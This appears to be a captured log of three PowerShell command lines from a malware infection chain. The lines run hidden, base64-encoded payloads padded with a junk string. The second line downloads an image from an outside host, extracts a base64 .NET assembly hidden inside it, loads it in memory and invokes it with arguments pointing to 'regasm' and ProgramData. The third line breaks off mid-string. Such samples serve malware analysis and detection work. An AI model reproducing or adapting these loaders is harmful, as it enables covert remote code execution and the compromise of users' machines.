cmdline	powershell -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bu0imageUrl = Ok0https://uploaddei'+'magen'+'s.com.br/ima'+'ges/004/683/779/original/download.jpg?1701878864Ok0;bu0webClient = New-Object System.Net.WebClient;bu0imageBytes = bu0webCl'+'ient.DownloadData(bu0imageUrl);bu0imageText = [Sy'+'stem.Text.Encoding]::UTF8.GetString(bu0imageBytes);bu0startFlag = Ok0<<BASE64_START>>Ok0;bu0endFl'+'ag = Ok0<<BASE64_END>>Ok0;bu0startIndex = bu0imageText.IndexOf(bu0startFlag);bu0endIndex = '+'bu0imageText.IndexOf(bu0endF'+'lag);bu0sta'+'rtIndex -ge 0 -and bu0endIndex -gt bu0startIn'+'dex;bu0startIndex += bu0startFlag.Length;bu0base64Length = bu0endIndex - bu0startIndex;bu0base64Command = bu0imageText.S'+'ubstring(bu0sta'+'rtIndex, bu0'+'base64Length);bu0co'+'mmandBytes = [System.Convert]::FromBase64String'+'(bu0base64Command);bu0loadedAssembly = [Syst'+'em.Reflection.Assembly]::Load(bu0commandBytes);bu0type = bu0loadedAssembly.GetType(Ok0ClassL'+'ibrary3.Class1Ok0);bu0method = bu0type.GetMetho'+'d(Ok0RunOk0).Invoke(bu0null, [object[]] (Ok0dH'+'h0'+'Lk1HWi8wMDMvOC4zNC44MjIuNjYvLzpwdHRoOk0 , Ok0Ok0 , Ok02Ok0 , Ok0regas'+'mOk0 , Ok06Ok0 , Ok0C:mK3ProgramDatamK3Ok0, Ok0htmljiOk0))') -rePlace'Ok0',[Char]39-CRePlacE 'bu0',[Char]36 -rePlace'mK3',[Char]92) \| . ( $EnV:CoMsPeC[4,24,25]-jOiN'')"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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